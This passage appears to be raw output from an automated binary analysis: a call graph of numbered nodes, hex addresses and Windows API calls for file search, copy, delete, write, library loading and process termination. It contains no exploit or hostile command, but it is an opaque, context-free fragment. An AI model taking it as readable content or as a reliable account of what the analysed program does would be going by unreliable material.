calls 98734->98735 98735->98736 98736->98664 98738 2814ce 98737->98738 98739 281471 98737->98739 98740 281981 59 API calls 98738->98740 98739->98738 98741 28147c 98739->98741 98747 28149f _memmove 98740->98747 98742 2bf1de 98741->98742 98743 281497 98741->98743 98744 281c7e 59 API calls 98742->98744 98754 281b7c 59 API calls Mailbox 98743->98754 98746 2bf1e8 98744->98746 98748 290fe6 Mailbox 59 API calls 98746->98748 98747->98694 98749 2bf208 98748->98749 98751 281aa4 59 API calls 98750->98751 98752 281614 98751->98752 98752->98687 98752->98706 98753->98715 98754->98747 98756 2818b4 __NMSG_WRITE 98755->98756 98757 281c7e 59 API calls 98756->98757 98758 2818c5 _memmove 98756->98758 98759 2bf4f1 _memmove 98757->98759 98758->98725 98761 28133d 59 API calls 98760->98761 98762 2d3f52 GetFileAttributesW 98761->98762 98763 2d3f66 GetLastError 98762->98763 98770 2d3f7f Mailbox 98762->98770 98764 2d3f73 CreateDirectoryW 98763->98764 98765 2d3f81 98763->98765 98764->98765 98764->98770 98766 281981 59 API calls 98765->98766 98765->98770 98767 2d3fc3 98766->98767 98768 2d3f1d 59 API calls 98767->98768 98769 2d3fcc 98768->98769 98769->98770 98771 2d3fd0 CreateDirectoryW 98769->98771 98770->98469 98771->98770 98773 281207 59 API calls 98772->98773 98774 2d3cff 98773->98774 98775 281207 59 API calls 98774->98775 98776 2d3d07 98775->98776 98777 281207 59 API calls 98776->98777 98778 2d3d0f 98777->98778 98779 281207 59 API calls 98778->98779 98780 2d3d17 98779->98780 98781 290284 60 API calls 98780->98781 98782 2d3d21 98781->98782 98783 290284 60 API calls 98782->98783 98784 2d3d2b 98783->98784 98818 2d4f82 98784->98818 98786 2d3d36 98787 2d4fec GetFileAttributesW 98786->98787 98788 2d3d41 98787->98788 98789 2d3d53 98788->98789 98790 281900 59 API calls 98788->98790 98791 2d4fec GetFileAttributesW 98789->98791 98790->98789 98792 2d3d5b 98791->98792 98793 2d3d68 98792->98793 98794 281900 59 API calls 98792->98794 98795 281207 59 API calls 98793->98795 98794->98793 98796 2d3d70 98795->98796 98797 281207 59 API calls 98796->98797 98798 2d3d78 98797->98798 98799 290119 59 API calls 98798->98799 98800 2d3d89 FindFirstFileW 98799->98800 98801 2d3eb4 FindClose 98800->98801 98816 2d3dac Mailbox 98800->98816 98806 2d3ebe Mailbox 98801->98806 98802 2d3e88 FindNextFileW 98802->98816 98803 281a36 59 API calls 98803->98816 98805 281c9c 59 API calls 98805->98816 98806->98468 98807 2817e0 59 API calls 98807->98816 98808 281900 59 API calls 98808->98816 98809 2d412a 3 API calls 98809->98816 98810 2d3eab FindClose 98810->98806 98811 2d3e2a 98814 2d3e4e MoveFileW 98811->98814 98815 2d3e3e DeleteFileW 98811->98815 98883 28151f 98811->98883 98812 2d3ef7 CopyFileExW 98812->98816 98814->98816 98815->98816 98816->98801 98816->98802 98816->98803 98816->98805 98816->98807 98816->98808 98816->98809 98816->98810 98816->98811 98816->98812 98817 2d3e6b DeleteFileW 98816->98817 98829 2d4561 98816->98829 98817->98816 98819 281207 59 API calls 98818->98819 98820 2d4f97 98819->98820 98821 281207 59 API calls 98820->98821 98822 2d4f9f 98821->98822 98823 290119 59 API calls 98822->98823 98824 2d4fae 98823->98824 98825 290119 59 API calls 98824->98825 98826 2d4fbe 98825->98826 98827 28151f 61 API calls 98826->98827 98828 2d4fce Mailbox 98827->98828 98828->98786 98830 2d457d 98829->98830 98831 2d4590 98830->98831 98832 2d4582 98830->98832 98834 281207 59 API calls 98831->98834 98833 281c9c 59 API calls 98832->98833 98835 2d458b Mailbox 98833->98835 98836 2d4598 98834->98836 98835->98816 98837 281207 59 API calls 98836->98837 98838 2d45a0 98837->98838 98839 281207 59 API calls 98838->98839 98840 2d45ab 98839->98840 98841 281207 59 API calls 98840->98841 98842 2d45b3 98841->98842 98843 281207 59 API calls 98842->98843 98844 2d45bb 98843->98844 98845 281207 59 API calls 98844->98845 98846 2d45c3 98845->98846 98847 281207 59 API calls 98846->98847 98848 2d45cb 98847->98848 98849 281207 59 API calls 98848->98849 98850 2d45d3 98849->98850 98851 290119 59 API calls 98850->98851 98852 2d45ea 98851->98852 98853 290119 59 API calls 98852->98853 98854 2d4603 98853->98854 98855 281609 59 API calls 98854->98855 98856 2d460f 98855->98856 98857 2d4622 98856->98857 98858 281981 59 API calls 98856->98858 98859 281609 59 API calls 98857->98859 98858->98857 98860 2d462b 98859->98860 98861 2d463b 98860->98861 98862 281981 59 API calls 98860->98862 98863 281c9c 59 API calls 98861->98863 98862->98861 98864 2d4647 98863->98864 98865 2817e0 59 API calls 98864->98865 98866 2d4653 98865->98866 98886 2d4713 59 API calls 98866->98886 98868 2d4662 98887 2d4713 59 API calls 98868->98887 98870 2d4675 98871 281609 59 API calls 98870->98871 98872 2d467f 98871->98872 98873 2d4684 98872->98873 98874 2d4696 98872->98874 98875 281900 59 API calls 98873->98875 98876 281609 59 API calls 98874->98876 98877 2d4691 98875->98877 98878 2d469f 98876->98878 98881 2817e0 59 API calls 98877->98881 98879 2d46bd 98878->98879 98880 281900 59 API calls 98878->98880 98882 2817e0 59 API calls 98879->98882 98880->98877 98881->98879 98882->98835 98888 2814db 98883->98888 98886->98868 98887->98870 98889 2814e9 CompareStringW 98888->98889 98890 2bf210 98888->98890 98892 28150c 98889->98892 98893 2bf25f 98890->98893 98894 294eb8 60 API calls 98890->98894 98892->98811 98894->98890 98896 2df898 98895->98896 98897 2df8f2 98895->98897 98898 290fe6 Mailbox 59 API calls 98896->98898 98971 2dfbb7 59 API calls 98897->98971 98900 2df89f 98898->98900 98901 2df8ab 98900->98901 98958 283df7 60 API calls Mailbox 98900->98958 98903 274d37 84 API calls 98901->98903 98908 2df8bd 98903->98908 98904 2df9cb 98951 2d8cd0 98904->98951 98905 2df8ff 98905->98904 98906 2df8d9 98905->98906 98912 2df93f 98905->98912 98906->98472 98959 283e47 98908->98959 98909 2df9d2 98955 2d394d 98909->98955 98914 274d37 84 API calls 98912->98914 98913 2df8cd 98913->98906 98970 283f0b CloseHandle 98913->98970 98915 2df946 98914->98915 98919 2df9c1 98915->98919 98930 2df97a 98915->98930 98917 2df9ae Mailbox 98917->98906 98922 2842cf CloseHandle 98917->98922 98932 2d399c 98919->98932 98921 28162d 59 API calls 98923 2df98a 98921->98923 98924 2dfa20 98922->98924 98925 281c9c 59 API calls 98923->98925 98924->98906 98972 283f0b CloseHandle 98924->98972 98926 2df994 98925->98926 98927 281900 59 API calls 98926->98927 98929 2df9a2 98927->98929 98931 2d399c 66 API calls 98929->98931 98930->98921 98931->98917 98933 2d39af 98932->98933 98934 2d3a15 98932->98934 98933->98934 98936 2d39b4 98933->98936 98935 2d394d 3 API calls 98934->98935 98950 2d39fd Mailbox 98935->98950 98937 2d3a09 98936->98937 98940 2d39be 98936->98940 98990 2d3a35 62 API calls Mailbox 98937->98990 98939 2d39de 98941 2840cd 59 API calls 98939->98941 98940->98939 98942 2d39c8 98940->98942 98943 2d39e6 98941->98943 98976 2840cd 98942->98976 98989 2d38e0 61 API calls Mailbox 98943->98989 98948 2d39dc 98973 2d397e 98948->98973 98950->98917 98952 2d8cde 98951->98952 98953 2d8cd9 98951->98953 98952->98909 98993 2d7d6e 61 API calls 2 library calls 98953->98993 98994 2d384c 98955->98994 98957 2d3959 WriteFile 98957->98917 98958->98901 98960 2842cf CloseHandle 98959->98960 98961 283e53 98960->98961 99003 2842f9 98961->99003 98963 283e95 98963->98905 98963->98913 98964 283e72 98964->98963 99011 283c61 62 API calls Mailbox 98964->99011 98966 283e84 99012 28389f 98966->99012 98969 2d394d 3 API calls 98969->98963 98970->98906 98971->98905 98972->98906 98974 2d394d 3 API calls 98973->98974 98975 2d3990 98974->98975 98975->98950 98977 290fe6 Mailbox 59 API calls 98976->98977 98978 2840e0 98977->98978 98979 281c7e 59 API calls 98978->98979 98980 2840ed 98979->98980 98981 28402a WideCharToMultiByte 98980->98981 98982 28404e 98981->98982 98983 284085 98981->98983 98984 290fe6 Mailbox 59 API calls 98982->98984 98992 283f20 59 API calls Mailbox 98983->98992 98986 284055 WideCharToMultiByte 98984->98986 98991 283f79 59 API calls 2 library calls 98986->98991 98988 284077 98988->98948 98989->98948 98990->98950 98991->98988 98992->98988 98993->98952 98995 2d385e 98994->98995 98996 2d3853 98994->98996 98995->98957 99001 2842ae SetFilePointerEx 98996->99001 98998 2d38b8 SetFilePointerEx 99002 2842ae SetFilePointerEx 98998->99002 99000 2d38d7 99000->98957 99001->98998 99002->99000 99004 2c06fc 99003->99004 99005 284312 CreateFileW 99003->99005 99006 284334 99004->99006 99007 2c0702 CreateFileW 99004->99007 99005->99006 99006->98964 99007->99006 99008 2c0728 99007->99008 99016 28410a 99008->99016 99011->98966 99013 2838a8 99012->99013 99014 2838b5 99012->99014 99015 28410a 2 API calls 99013->99015 99014->98963 99014->98969 99015->99014 99021 284124 99016->99021 99017 2c06cc 99025 2842ae SetFilePointerEx 99017->99025 99018 2841ab SetFilePointerEx 99024 2842ae SetFilePointerEx 99018->99024 99021->99017 99021->99018 99023 28417f 99021->99023 99022 2c06e6 99023->99006 99024->99023 99025->99022 99027 2d4131 99026->99027 99028 2d4965 FindFirstFileW 99026->99028 99027->98289 99028->99027 99029 2d497a FindClose 99028->99029 99029->99027 99031 274d37 84 API calls 99030->99031 99032 2ed203 99031->99032 99033 2ed24a Mailbox 99032->99033 99068 2ede8e 99032->99068 99033->98478 99035 2ed617 99118 2edfb1 92 API calls Mailbox 99035->99118 99038 2ed626 99039 2ed4b0 99038->99039 99041 2ed632 99038->99041 99081 2ed057 99039->99081 99040 274d37 84 API calls 99058 2ed29b Mailbox 99040->99058 99041->99033 99046 2ed4e9 99096 290e38 99046->99096 99049 2ed51c 99104 2747be 99049->99104 99050 2ed503 99103 2da48d 89 API calls 4 library calls 99050->99103 99053 2ed50e GetCurrentProcess TerminateProcess 99053->99049 99054 2ed4a2 99054->99035 99054->99039 99058->99033 99058->99040 99058->99054 99101 2dfc0d 59 API calls 2 library calls 99058->99101 99102 2ed6c8 61 API calls 2 library calls 99058->99102 99060 2ed68d 99060->99033 99064 2ed6a1 FreeLibrary 99060->99064 99061 2ed554 99116 2edd32 107 API calls _free 99061->99116 99064->99033 99066 2ed565 99066->99060 99067 27523c 59 API calls 99066->99067 99117 274230 59 API calls Mailbox 99066->99117 99119 2edd32 107 API calls _free 99066->99119 99067->99066 99069 281aa4 59 API calls 99068->99069 99070 2edea9 CharLowerBuffW 99069->99070 99120 2cf903 99070->99120 99074 281207 59 API calls 99075 2edee2 99074->99075 99076 281462 59 API calls 99075->99076 99077 2edef9 99076->99077 99078 281981 59 API calls 99077->99078 99079 2edf05 Mailbox 99078->99079 99080 2edf41 Mailbox 99079->99080 99127 2ed6c8 61 API calls 2 library calls 99079->99127 99080->99058 99082 2ed0c7 99081->99082 99083 2ed072 99081->99083 99087 2ee139 99082->99087 99084 290fe6 Mailbox 59 API calls 99083->99084 99086 2ed094 99084->99086 99085 290fe6 Mailbox 59 API calls 99085->99086 99086->99082 99086->99085 99088 2ee362 Mailbox 99087->99088 99095 2ee15c _strcat _wcscpy __NMSG_WRITE 99087->99095 99088->99046 99089 275087 59 API calls 99089->99095 99090 2750d5 59 API calls 99090->99095 99091 27502b 59 API calls 99091->99095 99092 29593c 58 API calls __malloc_crt 99092->99095 99093 274d37 84 API calls 99093->99095 99095->99088 99095->99089 99095->99090 99095->99091 99095->99092 99095->99093 99128 2d5e42 61 API calls 2 library calls 99095->99128 99097 290e4d 99096->99097 99098 290ee5 SetErrorMode 99097->99098 99099 290ed3 CloseHandle 99097->99099 99100 290eb3 99097->99100 99098->99100 99099->99100 99100->99049 99100->99050 99101->99058 99102->99058 99103->99053 99105 2747c6 99104->99105 99106 290fe6 Mailbox 59 API calls 99105->99106 99107 2747d4 99106->99107 99108 2747e0 99107->99108 99129 2746ec 59 API calls Mailbox 99107->99129 99110 274540 99108->99110 99130 274650 99110->99130 99112 27454f 99113 290fe6 Mailbox 59 API calls 99112->99113 99114 2745eb 99112->99114 99113->99114 99114->99066 99115 274230 59 API calls Mailbox 99114->99115 99115->99061 99116->99066 99117->99066 99118->99038 99119->99066 99121 2cf92e __NMSG_WRITE 99120->99121 99122 2cf96d 99121->99122 99125 2cf963 99121->99125 99126 2cfa14 99121->99126 99122->99074 99122->99079 99123 2814db 61 API calls 99123->99125 99124 2814db 61 API calls 99124->99126 99125->99122 99125->99123 99126->99122 99126->99124 99127->99080 99128->99095 99129->99108 99131 274659 Mailbox 99130->99131 99132 2ad6ec 99131->99132 99137 274663 99131->99137 99133 290fe6 Mailbox 59 API calls 99132->99133 99135 2ad6f8 99133->99135 99134 27466a 99134->99112 99137->99134 99138 275190 59 API calls Mailbox 99137->99138 99138->99137 99139->98495 99140->98492 99142 2ea918 99141->99142 99143 2ea970 99141->99143 99144 290fe6 Mailbox 59 API calls 99142->99144 99143->98519 99147 2ea93a 99144->99147 99145 290fe6 Mailbox 59 API calls 99145->99147 99147->99143 99147->99145 99173 2c715b 59 API calls Mailbox 99147->99173 99149 2d78ac 99148->99149 99151 2d78e3 99148->99151 99150 290fe6 Mailbox 59 API calls 99149->99150 99149->99151 99150->99151 99152 2c6ebc 99151->99152 99153 2c6f06 99152->99153 99160 2c6f1c Mailbox 99152->99160 99155 281a36 59 API calls 99153->99155 99154 2c6f47 99156 2ec355 301 API calls 99154->99156 99155->99160 99164 2c6f53 99156->99164 99157 2c6f5a 99158 27a820 301 API calls 99157->99158 99162 2c6f91 99158->99162 99160->99154 99160->99157 99161 2c7002 99161->98521 99163 2c6fdc 99162->99163 99162->99164 99166 2c6fc1 99162->99166 99163->99164 99179 2da48d 89 API calls 4 library calls 99163->99179 99180 2c6cf1 59 API calls Mailbox 99164->99180 99174 2c706d 99166->99174 99168->98521 99169->98529 99170->98535 99171->98547 99172->98551 99173->99147 99175 2c7085 99174->99175 99181 2e495b 99175->99181 99190 2ef1b2 99175->99190 99176 2c70d9 99176->99164 99179->99164 99180->99161 99182 290fe6 Mailbox 59 API calls 99181->99182 99183 2e496c 99182->99183 99195 28433f 99183->99195 99186 274d37 84 API calls 99187 2e498d GetEnvironmentVariableW 99186->99187 99198 2d7a51 59 API calls Mailbox 99187->99198 99189 2e49aa 99189->99176 99191 274d37 84 API calls 99190->99191 99192 2ef1cf 99191->99192 99193 2d4148 66 API calls 99192->99193 99194 2ef1de 99193->99194 99194->99176 99196 290fe6 Mailbox 59 API calls 99195->99196 99197 284351 99196->99197 99197->99186 99198->99189 99200 2d4d09 99199->99200 99202 2d4cf0 99199->99202 99206 2937c3 59 API calls __wcstoi64 99200->99206 99202->99200 99203 2d4d0f 99202->99203 99205 29385c GetStringTypeW _iswctype 99202->99205 99203->98565 99205->99202 99206->99203 99208 273b3f 99207->99208 99214 273b67 99207->99214 99209 273b4d 99208->99209 99210 273b31 59 API calls 99208->99210 99211 273b53 99209->99211 99212 273b31 59 API calls 99209->99212 99210->99209 99211->99214 99217 275190 59 API calls Mailbox 99211->99217 99212->99211 99214->98303 99215->98301 99216->98300 99217->99214 99219 276e4a 99218->99219 99221 276ff7 99218->99221 99220 2774d0 99219->99220 99219->99221 99223 276f2c 99219->99223 99228 276fdb 99219->99228 99220->99228 99245 2749e0 59 API calls wcstoxq 99220->99245 99221->99220 99221->99228 99230 277076 99221->99230 99233 276fbb Mailbox 99221->99233 99227 276f68 99223->99227 99223->99228 99223->99230 99225 2afc1e 99229 2afc30 99225->99229 99243 293f69 59 API calls __wtof_l 99225->99243 99227->99228 99227->99233 99234 2afa71 99227->99234 99228->98343 99229->98343 99230->99225 99230->99228 99230->99233 99242 2c7aad 59 API calls 99230->99242 99233->99225 99233->99228 99244 2741c4 59 API calls Mailbox 99233->99244 99234->99228 99241 293f69 59 API calls __wtof_l 99234->99241 99235->98343 99236->98332 99237->98344 99238->98347 99239->98344 99240->98344 99241->99234 99242->99233 99243->99229 99244->99233 99245->99228 99246->98351 99247 297e83 99248 297e8f _fseek 99247->99248 99284 29a038 GetStartupInfoW 99248->99284 99250 297e94 99286 298dac GetProcessHeap 99250->99286 99252 297eec 99255 297ef7 99252->99255 99369 297fd3 58 API calls 3 library calls 99252->99369 99287 299d16 99255->99287 99256 297efd 99257 297f08 __RTC_Initialize 99256->99257 99370 297fd3 58 API calls 3 library calls 99256->99370 99308 29d802 99257->99308 99260 297f17 99261 297f23 GetCommandLineW 99260->99261 99371 297fd3 58 API calls 3 library calls 99260->99371 99327 2a5153 GetEnvironmentStringsW 99261->99327 99264 297f22 99264->99261 99267 297f3d 99268 297f48 99267->99268 99372 2932e5 58 API calls 3 library calls 99267->99372 99337 2a4f88 99268->99337 99271 297f4e 99272 297f59 99271->99272 99373 2932e5 58 API calls 3 library calls 99271->99373 99351 29331f 99272->99351 99275 297f61 99276 297f6c __wwincmdln 99275->99276 99374 2932e5 58 API calls 3 library calls 99275->99374 99357 285f8b 99276->99357 99279 297f80 99280 297f8f 99279->99280 99375 293588 58 API calls _doexit 99279->99375 99376 293310 58 API calls _doexit 99280->99376 99283 297f94 _fseek 99285 29a04e 99284->99285 99285->99250 99286->99252 99377 2933b7 36 API calls 2 library calls 99287->99377 99289 299d1b 99378 299f6c InitializeCriticalSectionAndSpinCount __mtinitlocks 99289->99378 99291 299d20 99292 299d24 99291->99292 99380 299fba TlsAlloc 99291->99380 99379 299d8c 61 API calls 2 library calls 99292->99379 99295 299d29 99295->99256 99296 299d36 99296->99292 99297 299d41 99296->99297 99381 298a05 99297->99381 99300 299d83 99389 299d8c 61 API calls 2 library calls 99300->99389 99303 299d62 99303->99300 99305 299d68 99303->99305 99304 299d88 99304->99256 99388 299c63 58 API calls 4 library calls 99305->99388 99307 299d70 GetCurrentThreadId 99307->99256 99309 29d80e _fseek 99308->99309 99310 299e3b __lock 58 API calls 99309->99310 99311 29d815 99310->99311 99312 298a05 __calloc_crt 58 API calls 99311->99312 99313 29d826 99312->99313 99314 29d891 GetStartupInfoW 99313->99314 99315 29d831 _fseek @_EH4_CallFilterFunc@8 99313->99315 99321 29d8a6 99314->99321 99322 29d9d5 99314->99322 99315->99260 99316 29da9d 99403 29daad LeaveCriticalSection _doexit 99316->99403 99318 298a05 __calloc_crt 58 API calls 99318->99321 99319 29da22 GetStdHandle 99319->99322 99320 29da35 GetFileType 99320->99322 99321->99318 99321->99322 99324 29d8f4 99321->99324 99322->99316 99322->99319 99322->99320 99402 29a05b InitializeCriticalSectionAndSpinCount 99322->99402 99323 29d928 GetFileType 99323->99324 99324->99322 99324->99323 99401 29a05b InitializeCriticalSectionAndSpinCount 99324->99401 99328 297f33 99327->99328 99329 2a5164 99327->99329 99333 2a4d4b GetModuleFileNameW 99328->99333 99404 298a4d 58 API calls __malloc_crt 99329->99404 99331 2a51a0 FreeEnvironmentStringsW 99331->99328 99332 2a518a _memmove 99332->99331 99334 2a4d7f _wparse_cmdline 99333->99334 99336 2a4dbf _wparse_cmdline 99334->99336 99405 298a4d 58 API calls __malloc_crt 99334->99405 99336->99267 99338 2a4fa1 __NMSG_WRITE 99337->99338 99342 2a4f99 99337->99342 99339 298a05 __calloc_crt 58 API calls 99338->99339 99347 2a4fca __NMSG_WRITE 99339->99347 99340 2a5021 99341 292f85 _free 58 API calls 99340->99341 99341->99342 99342->99271 99343 298a05 __calloc_crt 58 API calls 99343->99347 99344 2a5046 99346 292f85 _free 58 API calls 99344->99346 99346->99342 99347->99340 99347->99342 99347->99343 99347->99344 99348 2a505d 99347->99348 99406 2a4837 58 API calls __beginthreadex 99347->99406 99407 298ff6 IsProcessorFeaturePresent 99348->99407 99350 2a5069 99350->99271 99353 29332b __IsNonwritableInCurrentImage 99351->99353 99430 29a701 99353->99430 99354 293349 __initterm_e 99355 292f70 __cinit 67 API calls 99354->99355 99356 293368 __cinit __IsNonwritableInCurrentImage 99354->99356 99355->99356 99356->99275 99358 285fa5 99357->99358 99368 286044 99357->99368 99359 285fdf IsThemeActive 99358->99359 99433 29359c 99359->99433 99363 28600b 99445 285f00 SystemParametersInfoW SystemParametersInfoW 99363->99445 99365 286017 99446 285240 99365->99446 99367 28601f SystemParametersInfoW 99367->99368 99368->99279 99369->99255 99370->99257 99371->99264 99375->99280 99376->99283 99377->99289 99378->99291 99379->99295 99380->99296 99383 298a0c 99381->99383 99384 298a47 99383->99384 99385 298a2a 99383->99385 99390 2a5426 99383->99390 99384->99300 99387 29a016 TlsSetValue 99384->99387 99385->99383 99385->99384 99398 29a362 Sleep 99385->99398 99387->99303 99388->99307 99389->99304 99391 2a544c 99390->99391 99392 2a5431 99390->99392 99395 2a545c HeapAlloc 99391->99395 99396 2a5442 99391->99396 99400 2935d1 DecodePointer 99391->99400 99392->99391 99393 2a543d 99392->99393 99399 298d58 58 API calls __getptd_noexit 99393->99399 99395->99391 99395->99396 99396->99383 99398->99385 99399->99396 99400->99391 99401->99324 99402->99322 99403->99315 99404->99332 99405->99336 99406->99347 99408 299001 99407->99408 99413 298e89 99408->99413 99412 29901c 99412->99350 99414 298ea3 _memset ___raise_securityfailure 99413->99414 99415 298ec3 IsDebuggerPresent 99414->99415 99421 29a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99415->99421 99418 298f87 ___raise_securityfailure 99422 29c826 99418->99422 99419 298faa 99420 29a370 GetCurrentProcess TerminateProcess 99419->99420 99420->99412 99421->99418 99423 29c82e 99422->99423 99424 29c830 IsProcessorFeaturePresent 99422->99424 99423->99419 99426 2a5b3a 99424->99426 99429 2a5ae9 5 API calls ___raise_securityfailure 99426->99429 99428 2a5c1d 99428->99419 99429->99428 99431 29a704 EncodePointer 99430->99431 99431->99431 99432 29a71e 99431->99432 99432->99354 99434 299e3b __lock 58 API calls 99433->99434 99435 2935a7 DecodePointer EncodePointer 99434->99435 99498 299fa5 LeaveCriticalSection 99435->99498 99437 286004 99438 293604 99437->99438 99439 293628 99438->99439 99440 29360e 99438->99440 99439->99363 99440->99439 99499 298d58 58 API calls __getptd_noexit 99440->99499 99442 293618 99500 298fe6 9 API calls __beginthreadex 99442->99500 99444 293623 99444->99363 99445->99365 99447 28524d __ftell_nolock 99446->99447 99448 281207 59 API calls 99447->99448 99449 285258 GetCurrentDirectoryW 99448->99449 99501 284ec8 99449->99501 99451 28527e IsDebuggerPresent 99452 28528c 99451->99452 99453 2c0b21 MessageBoxA 99451->99453 99454 2c0b39 99452->99454 99455 2852a0 99452->99455 99453->99454 99624 28314d 59 API calls Mailbox 99454->99624 99569 2831bf 99455->99569 99458 2c0b49 99465 2c0b5f SetCurrentDirectoryW 99458->99465 99464 28536c Mailbox 99464->99367 99465->99464 99498->99437 99499->99442 99500->99444 99502 281207 59 API calls 99501->99502 99503 284ede 99502->99503 99633 285420 99503->99633 99505 284efc 99506 2819e1 59 API calls 99505->99506 99507 284f10 99506->99507 99508 281c9c 59 API calls 99507->99508 99509 284f1b 99508->99509 99647 27477a 99509->99647 99512 281a36 59 API calls 99513 284f34 99512->99513 99514 2739be 68 API calls 99513->99514 99515 284f44 Mailbox 99514->99515 99516 281a36 59 API calls 99515->99516 99517 284f68 99516->99517 99518 2739be 68 API calls 99517->99518 99519 284f77 Mailbox 99518->99519 99520 281207 59 API calls 99519->99520 99521 284f94 99520->99521 99650 2855bc 99521->99650 99525 284fae 99526 284fb8 99525->99526 99527 2c0a54 99525->99527 99528 29312d _W_store_winword 60 API calls 99526->99528 99529 2855bc 59 API calls 99527->99529 99530 284fc3 99528->99530 99531 2c0a68 99529->99531 99530->99531 99532 284fcd 99530->99532 99533 2855bc 59 API calls 99531->99533 99534 29312d _W_store_winword 60 API calls 99532->99534 99535 2c0a84 99533->99535 99536 284fd8 99534->99536 99538 2900cf 61 API calls 99535->99538 99536->99535 99537 284fe2 99536->99537 99539 29312d _W_store_winword 60 API calls 99537->99539 99540 2c0aa7 99538->99540 99541 284fed 99539->99541 99542 2855bc 59 API calls 99540->99542 99543 2c0ad0 99541->99543 99544 284ff7 99541->99544 99545 2c0ab3 99542->99545 99547 2855bc 59 API calls 99543->99547 99546 28501b 99544->99546 99550 281c9c 59 API calls 99544->99550 99549 281c9c 59 API calls 99545->99549 99554 2747be 59 API calls 99546->99554 99548 2c0aee 99547->99548 99551 281c9c 59 API calls 99548->99551 99552 2c0ac1 99549->99552 99553 28500e 99550->99553 99556 2c0afc 99551->99556 99557 2855bc 59 API calls 99552->99557 99558 2855bc 59 API calls 99553->99558 99555 28502a 99554->99555 99559 274540 59 API calls 99555->99559 99560 2855bc 59 API calls 99556->99560 99557->99543 99558->99546 99561 285038 99559->99561 99562 2c0b0b 99560->99562 99666 2743d0 99561->99666 99562->99562 99564 27477a 59 API calls 99566 285055 99564->99566 99565 2743d0 59 API calls 99565->99566 99566->99564 99566->99565 99567 2855bc 59 API calls 99566->99567 99568 28509b Mailbox 99566->99568 99567->99566 99568->99451 99570 2831cc __ftell_nolock 99569->99570 99571 2c0314 _memset 99570->99571 99572 2831e5 99570->99572 99575 2c0330 GetOpenFileNameW 99571->99575 99573 290284 60 API calls 99572->99573 99574 2831ee 99573->99574 99685 2909c5 99574->99685 99576 2c037f 99575->99576 99578 281821 59 API calls 99576->99578 99580 2c0394 99578->99580 99580->99580 99582 283203 99703 28278a 99582->99703 99624->99458 99634 28542d __ftell_nolock 99633->99634 99635 281821 59 API calls 99634->99635 99641 285590 Mailbox 99634->99641 99637 28545f 99635->99637 99636 281609 59 API calls 99636->99637 99637->99636 99646 285495 Mailbox 99637->99646 99638 281609 59 API calls 99638->99646 99639 285563 99640 281a36 59 API calls 99639->99640 99639->99641 99642 285584 99640->99642 99641->99505 99644 284c94 59 API calls 99642->99644 99643 281a36 59 API calls 99643->99646 99644->99641 99646->99638 99646->99639 99646->99641 99646->99643 99675 284c94 99646->99675 99648 290fe6 Mailbox 59 API calls 99647->99648 99649 274787 99648->99649 99649->99512 99651 2855df 99650->99651 99652 2855c6 99650->99652 99654 281821 59 API calls 99651->99654 99653 281c9c 59 API calls 99652->99653 99655 284fa0 99653->99655 99654->99655 99656 29312d 99655->99656 99657 293139 99656->99657 99658 2931ae 99656->99658 99665 29315e 99657->99665 99681 298d58 58 API calls __getptd_noexit 99657->99681 99683 2931c0 60 API calls 3 library calls 99658->99683 99661 2931bb 99661->99525 99662 293145 99682 298fe6 9 API calls __beginthreadex 99662->99682 99664 293150 99664->99525 99665->99525 99667 2ad6c9 99666->99667 99669 2743e7 99666->99669 99667->99669 99684 2740cb 59 API calls Mailbox 99667->99684 99670 274530 99669->99670 99671 2744e8 99669->99671 99674 2744ef 99669->99674 99672 27523c 59 API calls 99670->99672 99673 290fe6 Mailbox 59 API calls 99671->99673 99672->99674 99673->99674 99674->99566 99676 284ca2 99675->99676 99680 284cc4 _memmove 99675->99680 99678 290fe6 Mailbox 59 API calls 99676->99678 99677 290fe6 Mailbox 59 API calls 99679 284cd8 99677->99679 99678->99680 99679->99646 99680->99677 99681->99662 99682->99664 99683->99661 99684->99669 99686 2a1b70 __ftell_nolock 99685->99686 99687 2909d2 GetLongPathNameW 99686->99687 99688 281821 59 API calls 99687->99688 99689 2831f7 99688->99689 99690 282f3d 99689->99690 99691 281207 59 API calls 99690->99691 99692 282f4f 99691->99692 99693 290284 60 API calls 99692->99693 99694 282f5a 99693->99694 99695 2c0177 99694->99695 99696 282f65 99694->99696 99697 28151f 61 API calls 99695->99697 99700 2c0191 99695->99700 99698 284c94 59 API calls 99696->99698 99697->99695 99699 282f71 99698->99699 99737 271307 99699->99737 99702 282f84 Mailbox 99702->99582 99743 2849c2 99703->99743 99738 271319 99737->99738 99742 271338 _memmove 99737->99742 99740 290fe6 Mailbox 59 API calls 99738->99740 99739 290fe6 Mailbox 59 API calls 99741 27134f 99739->99741 99740->99742 99741->99702 99742->99739 99926 284b29 99743->99926 99748 2849ed LoadLibraryExW 99936 284ade 99748->99936 99749 2c08bb 99751 284a2f 84 API calls 99749->99751 99753 2c08c2 99751->99753 99754 284ade 3 API calls 99753->99754 99756 2c08ca 99754->99756 99962 284ab2 99756->99962 99975 284b77 99926->99975 99929 284b50 99931 2849d4 99929->99931 99932 284b60 FreeLibrary 99929->99932 99930 284b77 2 API calls 99930->99929 99933 29547b 99931->99933 99932->99931 99979 295490 99933->99979 99935 2849e1 99935->99748 99935->99749 100060 284baa 99936->100060 99939 284baa 2 API calls 99942 284b03 99939->99942 99940 284a05 99943 2848b0 99940->99943 99941 284b15 FreeLibrary 99941->99940 99942->99940 99942->99941 99944 290fe6 Mailbox 59 API calls 99943->99944 99945 2848c5 99944->99945 99946 28433f 59 API calls 99945->99946 99947 2848d1 _memmove 99946->99947 99948 28490c 99947->99948 99949 2c080a 99947->99949 99950 284a6e 69 API calls 99948->99950 99951 2c0817 99949->99951 100069 2d9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99949->100069 99963 2c0945 99962->99963 99964 284ac4 99962->99964 100176 295802 99964->100176 99967 2d96c4 99976 284b44 99975->99976 99977 284b80 LoadLibraryA 99975->99977 99976->99929 99976->99930 99977->99976 99978 284b91 GetProcAddress 99977->99978 99978->99976 99980 29549c _fseek 99979->99980 99981 2954af 99980->99981 99984 2954e0 99980->99984 100028 298d58 58 API calls __getptd_noexit 99981->100028 99983 2954b4 100029 298fe6 9 API calls __beginthreadex 99983->100029 99998 2a0718 99984->99998 99987 2954e5 99988 2954fb 99987->99988 99989 2954ee 99987->99989 99991 295525 99988->99991 99992 295505 99988->99992 100030 298d58 58 API calls __getptd_noexit 99989->100030 100013 2a0837 99991->100013 100031 298d58 58 API calls __getptd_noexit 99992->100031 99997 2954bf _fseek @_EH4_CallFilterFunc@8 99997->99935 99999 2a0724 _fseek 99998->99999 100000 299e3b __lock 58 API calls 